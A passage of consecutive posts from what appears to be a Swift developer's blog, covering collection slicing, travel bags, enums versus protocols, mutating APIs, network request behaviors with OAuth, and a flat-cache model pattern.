we’re splitting a Sequence, the first thought is to use something built in: there’s a function called split, which takes a bunch of parameters ( maxSplits, omittingEmptySubsequences and a block called isSeparator to determine if an element defines a split). However, we can already see from the type signature that this function isn’t quite going to do what we want. The isSeparator function yields only one element, which makes it hard to tell if there should be a split between two consecutive elements, which is what we’re actually trying to do. In point of fact, this function is consumes the separators, because it’s a more generic version of the String function split, which is useful in its own right. No, we need something different. In her post, Erica Sadun has some answers for us: she’s got a function that works sort of like what we want. In this case, the block takes the current element and the current partition, and you can determine if the current element fits in the current partition. extension Sequence { public func partitioned(at predicate: (_ element: Iterator.Element, _ currentPartition: [Iterator.Element]) -> Bool ) -> [[Iterator.Element]] { var current: [Iterator.Element] = [] var results: [[Iterator.Element]] = [] for element in self { guard !current.isEmpty else { current = [element]; continue } switch predicate(element, current) { case true: results.append(current); current = [element] case false: current.append(element) } } guard !current.isEmpty else { return results } results.append(current) return results } } I’ve got a few small gripes with this function as implemented: The name. Partitioning in the standard library currently refers to changing the order of a MutableCollection and returning a pivot where the collection switches from one partition to another. I wouldn’t mind calling it something with split in the name, but as mentioned before, that usually consumes the elements. I think calling this slicing is the best thing to do. Slicing is also a concept that already exists in the standard library (taking a small part of an existing Collection) but in a lot of ways, that’s actually what we’re doing in this case. We’re just generating more than one slice. The name again. Specifically, the at in partition(at:) doesn’t seem exactly right. Since we’re not consuming elements anymore, the new partition has to happen either before the given element, or after it. The function’s name doesn’t tell us which. If we change the signature of the function to return a consecutive pair of elements, we can change its name to slice(between:). This has the added benefit of no longer requiring a force unwrap in usage. Erica’s whole problem with this code is that passing back a collection that is known to be non-empty (*COUGH*), means that she has to force unwrap access to the last element: testArray.partitioned(at: { $0 != $1.last! }) If we change the function to slice(between:), we can simplify this way down, to: testArray.slice(between: !=) Way nicer. Now that we’ve beaten the name into the ground, let’s move onto discussion about the implementation. Specifically, there is some duplication in the code that I find problematic. Two expressions in particular: First, current = [element] Second, results.append(current) This code may not look like much — only a few characters, you protest! — but it represents a duplication in concept. If these expressions needed to expand to do more, they’d have to be expanded in two places. This was excruciatingly highlighted when porting this code over to my gallery app (which is Objective-C) I wanted to wrap the image collections in a class called a PhotoSection. Creating the PhotoSection in two places made it painfully obvious that this algorithm duplicates code. This code is ugly and frustrating: the important part of the code, the actual logic of what’s happening is tucked away in the middle there. [photosForCurrentSection.lastObject.date timeIntervalSinceDate:photo.date] > 60*60 The entire rest of the code could be abstracted away. Part of this is Objective-C’s fault, but this version of the code really does highlight the duplication that happens when modifying the code that creates a new section. The last piece of the puzzle here is how Ruby’s Enumerable comes into play. When exploring that module, you can see three functions that look like they could be related: slice_when, slice_before, and slice_after. What is the relationship between these functions? It seems obvious now that I know, but I did have to do some searching around for blog posts to explain it. Essentially, slice_when is like our slice(between:). It gives you two elements and you tell it if there should be a division there. slice(before:) and slice(after:) each yield only one element in their block, and slice before or after that element. This clears up the confusion with Erica’s original function — we now know if it’ll slice before or after our element, based on the name of the function. As for implementation, you could use a for loop and the slight duplication of Erica’s code, but I’ve recently been trying to express more code in terms of chains of functions that express a whole operation that happens to the collection all at once. I find this kind of code more elegant, easier to read, and less prone to error, even though it does pass over the relevant collection multiple times. To write our slice(between:) function in that style, we first need two helpers: extension Collection { func eachPair() -> Zip2Sequence<Self, Self.SubSequence> { return zip(self, self.dropFirst()) } func indexed() -> [(index: Index, element: Element)] { return zip(indices, self).map({ (index: $0, element: $1) }) } } I’m a big fan of composing these operations together, from smaller, simpler concepts into bigger, more complex ones. There are slightly more performant ways to write both of those functions, but these simple implementations will do for now. extension Collection { func slice(between predicate: (Element, Element) -> Bool) -> [SubSequence] { let innerSlicingPoints = self .indexed() .eachPair() .map({ (indexAfter: $0.1.index, shouldSlice: predicate($0.0.element, $0.1.element)) }) .filter({ $0.shouldSlice }) .map({ $0.indexAfter }) let slicingPoints = [self.startIndex] + innerSlicingPoints + [self.endIndex] return slicingPoints .eachPair() .map({ self[$0..<$1] }) } } This function is broken up into 3 main sections: - Find the indexes after any point where the caller wants to divide the sequence. - Add the startIndexand the endIndex. - Create slices of for each consecutive pair of those indexes. Again, this isn’t the most performant implementation. Namely, it does quite a few iterations, and requires Collection where Erica’s solution required just a Sequence. But I do think it’s easier to read and understand. As I discussed in the post about refactoring, distilling an algorithm into forms straightforward, simple forms, operating at the highest possible level of abstraction, enables you to see the structure of our algorithm and potential transforms that it can undergo to create other algorithms. Erica’s original example is a lot simpler now: let groups = [1, 1, 2, 3, 3, 2, 3, 3, 4].slice(between: !=) To close this post out, the implementations for slice(before:) and slice(after:) practically fall out of the ether, now that we have slice(between:): extension Collection { func slice(before predicate: (Element) -> Bool) -> [SubSequence] { return self.slice(between: { left, right in return predicate(right) }) } func slice(after predicate: (Element) -> Bool) -> [SubSequence] { return self.slice(between: { left, right in return predicate(left) }) } } This enables weird things to become easy, like splitting a CamelCased type name: let components = "GalleryDataSource" .slice(before: { ("A"..."Z").contains($0) }) .map({ String($0) }) (Don’t try it with type name with a initialism in it, like URLSession.) A few months ago, Alex Cox put out a call on Twitter asking for someone to help her find a backpack that would suit her needs. She’d tried a bunch, and found all of them lacking. I have a small obsession with bags, suitcases, and backpacks. For probably 15 years now, I’ve been hunting for the “the perfect bag”. Along this journey, I’ve attained bag enlightenment, and I’m here to impart that knowledge to you today. Here’s the deal. You won’t find a perfect bag. This is for one simple reason: the perfect bag doesn’t exist. I know this because, at the time of writing, I own 4 rolling suitcases, 3 messenger bags, 3 daily carry backpacks, 2 travel backpacks, and 3 duffel bags/weekenders. They’re all stuffed inside each other, stacked in a small closet in my apartment, my Russian nesting travel bags. And every last one is a compromise in some way or another. These compromises are very apparent if you troll Kickstarter for travel backpacks. You’ll find tons: the Minaal, NOMATIC, PAKT One, Brevitē, Hexad, Allpa, RuitBag, Numi, and the aptly named DoucheBags. Their videos all start exactly the same: “We looked at every bag on the market, and found them lacking. We then spent 2 years designing our bag and sourcing the highest quality zippers, and we’re finally ready to start producing this bag.” They then go through the 5 features that they think makes their bag different from the rest, talk about a manufacturer they’ve found, and then they hit you with the “and that’s where you come in” and ask you for money. Once you watch the first of these videos, the argument is somewhat compelling. Wow, they’ve really figured it out! But once you’ve seen five of them, you know there must be something else going on. How could all these different bag startups claim that each other’s products are clearly inferior and that only they have discovered the secret to bag excellence? To understand what makes bags so unsatisfying, here’s a quote from Joel Spolsky:. It’s the same with bags. You need a big bag so that it can fit all your stuff, but you need a small bag to avoid hitting people on public transit. You need a bag with wheels so you can roll it through the airport, but you need a bag with backpack straps so that you can get over rougher terrain with it. You need a bag that’s soft so you can squish it into places, but you need a bag that’s hard so that it can protect what’s inside. These competing requirements can’t be simultaneously satisfied. You have to choose one or the other. You can’t have it both ways. In Buddhism, they say “there is no path, there are only paths.” It’s the same with bags. Once you accept that all bags are some form of compromise, you can get a few different bags and use the right one for the right trip. Sometimes I want to look nice and need to carry a laptop: leather messenger bag. Sometimes I want to have lots of space and flexibility even if I look kind of dorky: my high school backpack. Sometimes I have a bunch of a camera gear and I’m going to be gone for 3 weeks: checked rolling suitcase. Picking the right bag for the trip lets me graduate from “man, I wish I’d brought a bigger to bag” to “bringing a bigger bag would have been great, but then I wouldn’t have been able to jump on this scooter to the airport”. Less regret, more acceptance. It’s worth thinking about how you like to travel, what types of trips you take, what qualities you value having in your bags, and getting a few bags that meet those requirements. Of the 14 bags I mentioned earlier, I think I’ve used 12 of them this year for different trips/events. Finding the right bags takes time. I’ve had the oldest of my 14 bags for some 15 years, and got the newest of them in the last year. Some bags of note: - Kathmandu Shuttle 40L — This is my current favorite travel backpack. It’s pretty much one giant pocket, so doesn’t prescribe much in terms of how you should pack, and that flexibility is really nice. Kathmandu is an Australian company, so getting their stuff can be kind of tough, but I’m pretty happy with my pack. - I also really like the Osprey Stratos 34. It’s a bit on the small side, but a good addition to a rolling suitcase for a longer trip. It’s great for day hikes and has excellent ventilation. - Packable day packs: This backpack and this duffel bag are great. They add very little extra weight to your stuff, and they allow you to expand a little bit whe you get wherever you’re going. - Wirecutter’s recommendation for travel backpacks at the time of writing is the Osprey Farpoint 55. It used to be the Tortuga Outbreaker, which I think is absolutely hideous. Accept that no one bag will work in every situation. The truth will set you free. Over the course of this week, some bloggers have written about a problem — analytics events — a proposed multiple solutions to for this problem: enums, structs, and protocols. I also chimed in with a cheeky post about using inheritance and subclassing to solve this problem. I happened to have a post in my drafts about a few problems very similar to the analytics events that John proposed, and I think there’s no better time to post it than now. Without further ado: If a Swift programmer wants to bring two values together, like an Int and a String, they have two options. They can either use a “product type”, the construction of which requires you to have both values; or they can use a “sum type”, the construction of which requires you to have one value or the other. Swift is bountiful, however, and has 3 ways to express a product type and 3 ways to express a sum type. While plenty of ink has been spilled about when to use a struct, a class, or a tuple, there isn’t as much guidance on when to how to choose between an enum, protocol, or subclass. I personally haven’t found subclassing all that useful in Swift, as my post from early today implies, since protocols and enums are so powerful. In my year and a half writing Swift, I haven’t written an intentionally subclassable thing. So, for the purpose of this discussion, I’ll broadly ignore subclassing. Enums and protocols vary in a few key ways: - Completeness. Every case for an enum has to be declared when you declare the enum itself. You can’t add more cases in an extension or in a different module. On the other hand, protocols allow you to add new conformances anywhere in the codebase, even adding them across module boundaries. If that kind of flexibility is required, you have to use protocols. - Destructuring. To get data out of an enum, you have to pattern match. This requires either a switchor an if casestatement. These are a bit unwieldy to use (who can even remember the case letsyntax?) but are better than adding a method in the protocol for each type of variant data or casting to the concrete type and accessing it directly. Based on these differences, my hard-won advice on this is to use enums when you care which case you have, and use protocols you don’t — when all the cases can be treated the same. I want to take a look at two examples, and decide whether enums or protocols are a better fit. Errors Errors are frankly a bit of a toss up. On the one hand, errors are absolutely a situation where we care which case we have; also, catch pattern matching is very powerful when it comes to enums. Let’s take a look at an example error. enum NetworkError: Error { case noInternet case statusCode(Int) case apiError(message: String) } If something throws an error, we can switch in the catch statement: do { // something that produces a network error } catch NetworkError.noInternet { // handle no internet } catch let NetworkError.statusCode(statusCode) { // use `statusCode` here to handle this error } catch { // catch any other errors } While this matching syntax is really nice, using enums for your errors comes with a few downsides. First, it hamstrings you if you’re maintaining an external library. If you, the writer of a library, add a new enum case to an error, and a consumer of your library updates, they’ll have to change any code which exhaustively switches on your error enum. While this is desirable in some cases, it means that, per semantic versioning, you’ll have to bump the major version number of your library. This makes adding a new enum case in an external libraries is currently a breaking change. Swift 5 should be bringing nonexhaustive enums, which will ameliorate this problem. The second issue with enums is that this type gets muddy fast. Let’s say you want to provide conformance to the LocalizedError protocol to get good bridging to NSError. Because each case has its own scheme for how to convert its associated data into the userInfo dictionary, you’ll end up with a giant switch statement. When examining this error, it becomes apparent that the cases of the enum don’t really have anything to do with each other. NetworkError is really only acting as a convenient namespace for these errors. One approach here is to just use structs instead. struct NoInternetError: Error { } struct StatusCodeError: Error { let statusCode: Int } struct APIError: Error { let message: String } If each of these network error cases become their own type, we get a few cool things: a nice breakdown between types, custom initializers, easier conformance to things like LocalizedError, and it’s just as easy to pattern match: do { // something that produces a network error } catch let error as StatusCodeError { } catch let error as NoInternetError { } catch { // catch any other errors } You could even make all of the different structs conform to a protocol, called NetworkError. However, there is one downside to making each error case into its own type. Swift’s generic system requires a concrete type for all generic parameters; you can’t use a protocol there. Put another way, if the type’s signature is Result<T, E: Error>, you have to use an error enum. If the type’s signature is Result<T>, then the error is untyped and you can use anything that conforms to Swift.Error. API Endpoints Because talking to an API has a fixed number of endpoints, it can be tempting to model each of those endpoints as an enum case. However, all requests more or less have the same data: method, path, parameters, etc. If you implement your network requests as an enum, you’ll have a methods with giant switch statements in them — one each for the method, path, and so on. If you think about how this data is broken up, it’s exactly flipped. When you look at a chunk of code, do you want to see all of the paths for all the endpoints in one place, or do you want to see the method, path, parameters, and so on for one request in one place? How do you want to colocate your data? For me, I definitely want to have all the data for each request in one place. This is the locality problem that Matt mentioned in his post. Protocols shine when the interface to all of the different cases are similar, so they work well for describing network requests. protocol Request { var method: Method { get } var path: String { get } // etc } Now, you can actually conform to this protocol with either a struct or enum (Inception gong), if it does happen to be the right time to use an enum for a subset of your requests. This is Dave’s point about flexibility. More importantly, however, your network architecture won’t care. It’ll just get an object conforming to the protocol and request the right data from it. Protocols confer a few other benefits here as well: - You might find that it makes life easier to conform URLto your Requestprotocol, and you can easily do that. - Associating a type with a protocol is possible, associating a type with an enum case is meaningfully impossible. This means you can get well-typed results back from your network architecture. Implementations of the protocol are so flexible that you can bring your own sub-abstractions as you need to. For example, in the Beacon API, we needed to be able to get Twitter followers and following. These requests are nearly identical in their parameters, results, and everything save for the path. struct FollowersRequest: TypedRequest { typealias OutputType = IDsResult enum Kind { case followers, following var pathComponent: String { return self == .followers ? "followers" : "friends" } } let path: String init(kind: Kind) { self.path = kind.pathComponent + "/ids.json" } } Being able to bring your own abstractions to the protocol is just one more reason protocols are the right tool for the job here. There are other cases that are useful for exploring when to use enums and protocols, but these two I think shine the most light on the problem. Use enums when you care which case you have, and use protocols when you don’t. This is a response to Dave DeLong’s article, which is itself a response to Matt Diephouse’s article, which is itself a response to John Sundell’s article. You should go read these first. Dave starts off by saying: Matt starts off by saying: Earlier this week, John Sundell wrote a nice article about building an enum-based analytics system in Swift. He included many fine suggestions, but I believe he’s wrong about one point: that enums are the right choice. Therefore, I’ll start similarly: Earlier this week, Matt Diephouse wrote a nice article about building a struct-based analytics system in Swift. He included many fine suggestions, but I believe he’s wrong about one point: that structs are the right choice. Therefore, I’ll start similarly: Earlier this week, Dave DeLong wrote a nice article about building a protocol-based analytics system in Swift. He included many fine suggestions, but I believe he’s wrong about one point: that protocols are the right choice. As examples in both articles show, analytic events can have different payloads of information that they’re going to capture. While you can use many different approaches to solve this problem, I believe creating a deep inheritance hierarchy is the best solution. Using reference types ( class in Swift) with an inheritance hierarchy yields all the upsides of the other solutions. Like John’s solution of enums, they can store data on a per-event basis. Like Matt’s solution, you can create new analytics events across module boundaries. And like Dave’s solution, you can build a hierarchy of categorization for your analytics events. However, in addition to all these benefits, subclassing brings a few extra benefits the other solutions don’t have. Subclassing allows you to store new information with each layer of your hierarchy. Let’s take a look at the metadata specifically. If you have a base class called AnalyticsEvent, a subclass for NetworkEvent, a subclass for NetworkErrorEvent, and a subclass for NoInternetNetworkErrorEvent, each subclass can bring its own components to the metadata. For example: open class AnalyticsEvent { var name: String { fatalError("name must be provided by a subclass") } var metadata: [String: Any] { return ["AppVersion": version] } } open class NetworkEvent: AnalyticsEvent { var urlSessionConfiguration: URLSessionConfiguration override var metadata: [String: Any] { return super .metadata .merging(["UserAgent": userAgent]) { (_, new) in new } } } open class NetworkErrorEvent: NetworkEvent { var error: Error override var metadata: [String: Any] { return super .metadata .merging(["ErrorCode": error.code]) { (_, new) in new } } } open class NoInternetNetworkErrorEvent: NetworkErrorEvent { override var name = "NoInternetNetworkErrorEvent" override var metadata: [String: Any] { return super .metadata .merging(["Message": "No Internet"]) { (_, new) in new } } } As you can see, this reduces duplication between various types of analytics events. Each layer refers to the layers above it, in an almost recursive style. I hope this article has convinced you to try subclassing to solve your next problem. While Swift gives us many different ways to solve a problem, I’m confident that a deep inheritance hierarchy is the solution for this one. Swift structs can provide mutating and nonmutating versions of their functions. However, the Swift standard library is inconsistent about when it provides one form of a function or the other. Some APIs come in only mutating forms, some come only in nonmutating, and some come in both. Because both types of functions are useful in different situations, I argue that almost all such functions should have both versions provided. In this post, we’ll examine when these different forms are useful, examples APIs that provide one but not the other, and solutions for this problem. (Quick sidebar here: I’ll be referring to functions that return a new struct with some field changed as nonmutating functions. Unfortunately, Swift also includes a keyword called nonmutating, which is designed for property setters that don’t require the struct to be copied when they’re set. Because I think that nonmutating is the best word to describe functions that return an altered copy of the original, I’ll keep using that language here. Apologies for the confusion.) Mutating and Nonmutating Forms These two forms, mutating and nonmutating, are useful in different cases. First, let’s look at when the nonmutating version is more useful. This code, taken from Beacon’s OAuthSignatureGenerator, uses a long chain of immutable functions to make its code cleaner and more uniform: public var authorizationHeader: String { let headerComponents = authorizationParameters .dictionaryByAdding("oauth_signature", value: self.oauthSignature) .urlEncodedQueryPairs(using: self.dataEncoding) .map({ pair in "\(pair.0)=\"\(pair.1)\"" }) .sorted() .joined(separator: ", ") return "OAuth " + headerComponents } However, it wouldn’t be possible without an extension adding dictionaryByAdding(_:,value:), the nonmutating version of the subscript setter. Here’s another, slightly more academic example. Inverting a binary tree is more commonly a punchline for bad interviews than practically useful, but the algorithm illustrates this point nicely. To start, let’s define a binary tree an enum like so: indirect enum TreeNode<Element> { case children(left: TreeNode<Element>, right: TreeNode<Element>, value: Element) case leaf(value: Element) } To invert this binary tree, the tree on the left goes on the right, and the tree on right goes on the left. The recursive form of nonmutating version is simple and elegant: extension TreeNode { func inverted() -> TreeNode<Element> { switch self { case let .children(left, right, value): return .children(left: right.inverted(), right: left.inverted(), value: value) case let .leaf(value: value): return .leaf(value: value) } } } Whereas the recursive mutating version contains lots of extra noise and nonsense: extension TreeNode { mutating func invert() { switch self { case let .children(left, right, value): var rightCopy = right rightCopy.invert() var leftCopy = left leftCopy.invert() self = .children(left: rightCopy, right: leftCopy, value: value) case .leaf(value: _): break } } } Mutating functions are also useful, albeit in different contexts. We primarily work in apps that have a lot of state, and sometimes that state is represented by data in structs. When mutating that state, we often want to do it in place. Swift gives us lots of first class affordances for this: the mutating keyword was added especially for this behavior, and changing any property on a struct acts as a mutating function as well, reassigning the reference to a new copy of the struct with the value changed. There are concrete examples as well. If you’re animating a CGAffineTransform on a view, that code currently has to look something like this. UIView.animate(duration: 0.25, animations: { view.transform = view.transform.rotated(by: .pi) }) Because the transformation APIs are all nonmutating, you have to manually assign the struct back to the original reference, causing duplicated, ugly code. If there were a mutating rotate(by:) function, then this code would be much cleaner: UIView.animate(duration: 0.25, animations: { view.transform.rotate(by: .pi) }) The APIs aren’t consistent The primary problem here is that while both mutating functions and nonmutating functions are useful, not all APIs provide versions for both. Some APIs include only mutating APIs. This is common with collections. Both the APIs for adding items to collections, like Array.append, Dictionary.subscript, Set.insert, and APIs for removing items from collections, like Array.remove(at:), Dictionary.removeValue(forKey:), and Set.remove, have this issue. Some APIs include only nonmutating APIs. filter and map are defined on Sequence, and they return arrays, so they can’t be mutating (because Sequence objects can’t necessarily be mutated). However, we could have a mutating filterInPlace function on Array. The aforementioned CGAffineTransform functions also fall in this category. They only include nonmutating versions, which is great for representing a CGAffineTransform as a chain of transformations, but not so great for mutating an existing transform, say, on a view. Some APIs provide both. I think sorting is a great example of getting this right. Sequence includes sorted(by:), which is a nonmutating function that returns a sorted array, whereas MutableCollection (the first protocol in the Sequence and Collection heirarchy that allows mutation) includes sort(by:). This way, users of the API can choose whether they want a mutating sort or a nonmutating sort, and they’re available in the API where they’re first possible. Array, of course, conforms to MutableCollection and Sequence, so it gets both of them. Another example of an API that gets this right: Set includes union (nonmutating) and formUnion (mutating). (I could quibble with these names, but I’m happy that both version of the API exist.) Swift 4’s new Dictionary merging APIs also include both merge(_:uniquingKeysWith:) and merging(_:uniquingKeysWith:). Bridging Between the Two The interesting thing with this problem is that, because of the way Swift is designed, it’s really easy to bridge from one form to the other. If you have the mutating version of any function: mutating func mutatingVersion() { ... } You can synthesize a nonmutating version: func nonMutatingVersion() -> Self { var copy = self copy.mutatingVersion() return copy } And vice versa, if you already have a nonmutating version: func nonMutatingVersion() -> Self { ... } mutating func mutatingVersion() { self = self.nonMutatingVersion() } As long as the type returned by the nonmutating version is the same as Self, this trick works for any API, which is awesome. The only thing you really need is the new name for the alternate version. Leaning on the Compiler With this, I think it should be possible to have the compiler trivially synthesize one version from the other for us. Imagine something like this: extension Array { @synthesizeNonmutating(appending(_:)) mutating func append(_ newElement) { // ... } } The compiler would use the same trick above — create a copy, mutate the copy, and return it — to synthesize a nonmutating version of this function. You could also have a @synthesizeMutating keyword. Types could of course choose not to use this shorthand, which they might do in instances where there are there are optimizations for one form or another. However, getting tooling like this means that API designers no longer have to consider whether they’re APIs are likely to be used in mutating or nonmutating ways, and they can easily add both forms. Because each form is useful in different contexts, providing both allows the consumer of an API to choose which form they want and when. Very early this year, I posted about request behaviors. These simple objects can help you factor out small bits of reused UI, persistence, and validation code related to your network. If you haven’t read the post, it lays the groundwork for this post. Request behaviors are objects that can exceute arbitrary code at various points during some request’s execution: before sending, after success, and after failure. They also contain hooks to add any necessary headers and arbitrarily modify the URL request. If you come from the server world, you can think of request behaviors as sort of reverse middleware. It’s a simple pattern, but there are lots of very powerful behaviors that can be built on top of them. In the original post, I proposed 3 behaviors, that because of their access to some piece of global state, were particularly hard to test: BackgroundTaskBehavior, NetworkActivityIndicatorBehavior, AuthTokenHeaderBehavior. Those are useful behaviors, but in this post, I want to show a few more maybe less obvious behaviors that I’ve used across a few apps. API Verification One of the apps where I’ve employed this pattern needs a very special behavior. It relies on receiving 2XX status codes from sync API requests. When a request returns a 200, it assumes that sync request was successfully executed, and it can remove it from the queue. The problem is that sometimes, captive portals, like those used at hotels or at coffee shops, will often redirect any request to their special login page, which returns a 200. There are a few ways to handle this, but the solution we opted for was to send a special header that the server would turn around and return completely unmodified. No returned header? Probably a captive portal or some other tomfoolery. To implement this, the server used a very straightforward middleware, and the client needed some code to handle it as well. Perfect for a request behavior. class APIVerificationBehavior: RequestBehavior { let nonce = UUID().uuidString var additionalHeaders: [String: String] { return ["X-API-Nonce": nonce] } func afterSuccess(response: AnyResponse) throws { guard let returnedNonce = response.httpResponse.httpHeaderFields["X-API-Nonce"], returnedNonce == nonce { throw APIError(message: "Sync request intercepted.") } } } It requires a small change: making the afterSuccess method a throwing method. This lets the request behavior check conditions and fail the request if they’re not met, and it’s a straightforward compiler-driven change. Also, because the request behavior architecture is so testable, making changes like this to the network code can be reliably tested, making changes much easier. OAuth Behavior Beacon relies on Twitter, which uses OAuth for authentication and user identification. At the time I wrote the code, none of the Swift OAuth libraries worked correctly on Linux, so there was a process of extracting, refactoring, and, for some components, rewriting the libraries to make them work right. While I was working on this, I was hoping to test out one of the reasons I wanted to created request behaviors in the first place: to decouple the authentication protocol (OAuth, in this case) from the data that any given request requires. You should be able to transparently add OAuth to a request without having to modify the request struct or the network client at all. Extracting the code to generate the OAuth signature was a decent amount of work. Debugging in particular is hard for OAuth, and I recommend this page on Twitter’s API docs which walks you through the whole process and shows you what your data should look like at each step. (I hope this link doesn’t just break when Twitter inevitably changes its documentation format.) I also added tests for each step, so that if anything failed, it would be obvious which steps succeeded and which steps failed. Once you have something to generate the OAuth signature (called OAuthSignatureGenerator here), the request behavior for adding OAuth to a request turns out to not be so bad. struct Credentials { let key: String let secret: String } class OAuthRequestBehavior: RequestBehavior { var consumerCredentials: Credentials var credentials: Credentials init(consumerCredentials: Credentials, credentials: Credentials) { self.consumerCredentials = consumerCredentials self.credentials = credentials } func modify(request: URLRequest) -> URLRequest { let generator = OAuthSignatureGenerator(consumerCredentials: consumerCredentials, credentials: credentials, request: request) var mutableRequest = request mutableRequest.setValue(generator.authorizationHeader, forHTTPHeaderField: "Authorization") return mutableRequest } } Using modify(request:) to perform some mutation of the request, we can add the header for the OAuth signature from OAuthSignatureGenerator. Digging into the nitty-gritty of OAuth is a out of the scope of this post, but you can find the code for the signature generator here. The only thing of note is that this code relies on Vapor’s SHA1 and base 64 encoding, which you’ll have to swap out for implementations more friendly to your particular environment. When it’s time to use the use this behavior to create a client, you can create a client specific to the Twitter API, and then you’re good to go: let twitterClient = NetworkClient( configuration: RequestConfiguration( baseURLString: "", defaultRequestBehavior: oAuthBehavior ) ) Persistence I also explored saving things to Core Data via request behaviors, without having to trouble the code that sends the request with that responsibility. This was another promise of the request behavior pattern: if you could write reusable and parameterizable behaviors for saving things to Core Data, you could cut down on a lot of boilerplate. However, when implementing this, we ran into a wrinkle. Each request needs to finish saving to Core Data before the request’s promise is fulfilled. However, the current afterSuccess(result:) and afterFailure(error:) methods are synchronous and called on the main thread. Saving lots of data to Core Data can take seconds, during which time the UI can’t be locked up. We need to change these methods to allow asynchronous work. If we define a function that takes a Promise and returns a Promise, we can completely subsume three methods: beforeSend, afterSuccess, afterFailure. func handleRequest(promise: Promise<AnyResponse>) -> Promise<AnyResponse> { // before request return promise .then({ response in // after success }) .catch({ error in // after failure }) } Now, we can do asynchronous work when the request succeeds or fails, and we can also cause a succeeding to request to fail if some condition isn’t met (like in the first example in this post) by throwing from the then block. Core Data architecture varies greatly from app to app, and I’m not here to prescribe any particular pattern. In this case, we have a foreground context (for reading) and background context (for writing). We wanted simplify the creation of a Core Data request behavior; all you should have to provide is a context and a method that will be performed by that context. Building a protocol around that, we ended up with something like this: protocol CoreDataRequestBehavior: RequestBehavior { var context: NSManagedObjectContext { get } func performBeforeSave(in context: NSManagedObjectContext, withResponse response: AnyResponse) throws } And that protocol is extended to provide a handle all of the boilerplate mapping to and from the Promise: extension CoreDataRequestBehavior { func handleRequest(promise: Promise<AnyResponse>) -> Promise<AnyResponse> { return promise.then({ response in return Promise<AnyResponse>(work: { fulfill, reject in self.context.perform({ do { try self.performBeforeSave(in: context, withResponse: response) try context.save() fulfill(response) } catch let error { reject(error) } }) }) }) } } Creating a type that conforms to CoreDataRequestBehavior means that you provide a context and a function to modify that context before saving, and that function will be called on the right thread, will delay the completion of the request until the work in the Core Data context is completed. As an added bonus, performBeforeSave is a throwing function, so it’ll handle errors for you by failing the request. On top of CoreDataRequestBehavior you can build more complex behaviors, such as a behavior that is parameterized on a managed object type and can save an array of objects of that type to Core Data. Request behaviors provide the hooks to attach complex behavior to a request. Any side effect that needs to happen during a network request is a great candidate for a request behavior. (If these side effects occur for more than one request, all the better.) These three examples highlight more advanced usage of request behaviors. The model layer of a client is a tough nut to crack. Because it’s not the canonical representation of the data (that representation lives on the server), the data must live a fundamentally transient form. The version of the data that the app has is essentially a cache of what lives on the network (whether that cache is in memory or on-disk), and if there’s anything that’s true about caches, it’s that they will always end up with stale data. The truth is multiplied by the number of caches you have in your app. Reducing the number of cached versions of any given object decreases the likelihood that it will be out of date. Core Data has an internal feature that ensures that there is never more than one instance of an object for a given identifier (within the same managed object context). They call this feature “uniquing”, but it is known more broadly as the identity map pattern. I want to steal it without adopting the rest of baggage of Core Data. I think of this concept as a “flat cache”. A flat cache is basically just a big dictionary. The keys are a composite of an object’s type name and the object’s ID, and the value is the object. A flat cache normalizes the data in it, like a relational database, and all object-object relationships go through the flat cache. A flat cache confers several interesting benefits. - Normalizing the data means that you’ll use less bandwidth while the data is in-flight, and less memory while the data is at rest. - Because data is normalized, modifying or updating a resource in one place modifies it everywhere. - Because relationships to other entities go through the flat cache, back references with structs are now possible. Back references with classes don’t have to be weak. - With a flat cache of structs, any mutation deep in a nested struct only requires the object in question to change, instead of the object and all of its parents. In this post, we’ll discuss how to make this pattern work in Swift. First, you’ll need the composite key. struct FlatCacheKey: Equatable, Hashable { let typeName: String let id: String static func == (lhs: FlatCacheKey, rhs: FlatCacheKey) -> Bool { return lhs.typeName == rhs.typeName && lhs.id == rhs.id } var hashValue: Int { return typeName.hashValue ^ id.hashValue } } We can use a protocol to make the generation of flat cache keys easier: protocol Identifiable { var id: String { get } } protocol Cachable: Identifiable { } extension Cachable { static var typeName: String { return String(describing: self) } var flatCacheKey: FlatCacheKey { return FlatCacheKey(typeName: Self.typeName, id: id) } } All of our model objects already have IDs so they can trivially conform to Cachable and Identifiable. Next, let’s get to the basic flat cache. class FlatCache { static let shared = FlatCache() private var storage: [FlatCacheKey: Any] = [:] func set<T: Cachable>(value: T) { storage[value.flatCacheKey] = value } func get<T: Cachable>(id: String) -> T? { let key = FlatCacheKey(typeName: T.typeName, id: id) return storage[key] as? T } func clearCache() { storage = [:] } } Not too much to say here, just a private dictionary and get and set methods. Notably, the set method only takes one parameter, since the key for the flat cache can be derived from the value. Here’s where the interesting stuff happens. Let’s say you have a Post with an Author. Typically, the Author would be a child of the struct Author { let name: String } struct Post { let author: Author let content: String } However, if you wanted back references (so that you could get all the posts by an author, let’s say), this isn’t possible with value types. This kind of relationship would cause a reference cycle, which can never happen with Swift structs. If you gave the Author a list of Post objects, each Post would be a full copy, including the Author which would have to include the author’s posts, et cetera. You could switch to classes, but the back reference would cause a retain cycle, so the reference would need to be weak. You’d have to manage these weak relationships back to the parent manually. Neither of these solutions is ideal. A flat cache treats relationships a little differently. With a flat cache, each relationship is fetched from the centralized identity map. In this case, the Post has an authorID and the Author would have a list of postIDs: struct Author: Identifiable, Cachable { let id: String let name: String let postIDs: [String] } struct Post: Identifiable, Cachable { let id: String let authorID: String let content: String } Now, you still have to do some work to fetch the object itself. To get the author for a post, you would write something like: FlatCache.shared.get(id: post.authorID) as Author You could put this into an extension on the Post to make it a little cleaner: extension Post { var author: Author? { return FlatCache.shared.get(id: authorID) } } But this is pretty painful to do for every single relationship in your model layer. Fortunately, it’s something that can be generated! By adding an annotation to the ID property, you can tell a tool like Sourcery to generate the computed accessors for you. I won’t belabor the explanation of the template, but you can find it here. If you have trouble reading it or understanding how it works, you can read the Sourcery in Practice post. It will let you write Swift code like this: struct Author { let name: String // sourcery: relationshipType = Post let postIDs: [String] } struct Post { // sourcery: relationshipType = Author let authorID: String let content: String } Which will generate a file that looks like this: // Generated using Sourcery 0.8.0 — // DO NOT EDIT extension Author { var posts: [Post] { return postIDs.flatMap({ id -> Post? in return FlatCache.shared.get(id: id) }) } } extension Post { var author: Author? { return FlatCache.shared.get(id: authorID) } } This is the bulk of the pattern. However, there a few considerations to examine. JSON Building this structure from a tree of nested JSON is messy and tough. The system works a lot better if you use a structure of the JSON looks like the structure of the flat cache. All the objects exist in a big dictionary at the top level (one key for each type of object), and the relationships are defined by IDs. When a new JSON payload comes in, you can iterate over this top level, create all your local objects, and store them in the flat cache. Inform the requester of the JSON that the new objects have been downloaded, and then it can fetch relevant objects directly from the flat cache. The ideal structure of the JSON looks a lot like 